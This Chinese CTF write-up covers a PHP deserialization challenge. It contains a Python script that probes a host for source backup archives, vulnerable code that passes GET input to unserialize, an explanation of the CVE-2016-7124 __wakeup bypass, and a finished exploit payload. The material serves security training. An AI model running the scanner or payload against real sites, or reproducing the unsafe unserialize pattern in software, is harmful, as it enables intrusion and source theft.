PHP
分享一个很有意思的脚本:
# python3
import requests
# url1为被扫描地址,后不加‘/’
url1 = 'http://dc978cce-0571-40d6-8a75-ac2c41c57fed.node3.buuoj.cn'
# 常见的网站源码备份文件名
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar', 'bak']
for i in list1:
for j in list2:
back = str(i) + '.' + str(j)
url = str(url1) + '/' + back
print(back + ' ', end='')
print(len(requests.get(url).text))
扫出来www.zip,下载后发现网页有假flag以及class.php。
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
调用在index.php:
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
要求密码必须为100且用户名必须为admin,但是在__wakeup函数中会将username设置为'guest',就需要绕过__wakeup。
老考点了,用到的是CVE-2016-7124漏洞,在特定的PHP版本绕过__walkup。
要注意到的是反序列化后的public,private以及protected三种变量的值具体表达方法不一样,使用的时候要注意区分。
当一个类为:
<?php
class Example{
public $test = 'a';
}
$example = new Example();
echo serialize($example);
返回结果为:
O:7:"Example":1:{s:4:"test";s:1:"a";}
当类型为private时,情况就会稍微复杂一些。
<?php
class Example{
private $test = 'a';
}
$example = new Example();
echo serialize($example);
返回结果为:
O:7:"Example":1:{s:13:"%00Example%00test";s:1:"a";}
当类型为protected
<?php
class Example{
protected $test = 'a';
}
$example = new Example();
echo serialize($example);
返回结果为:
O:7:"Example":1:{s:7:"%00*%00test";s:1:"a";}
本题最终构造的反序列化字符串:
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
Last modified 8mo ago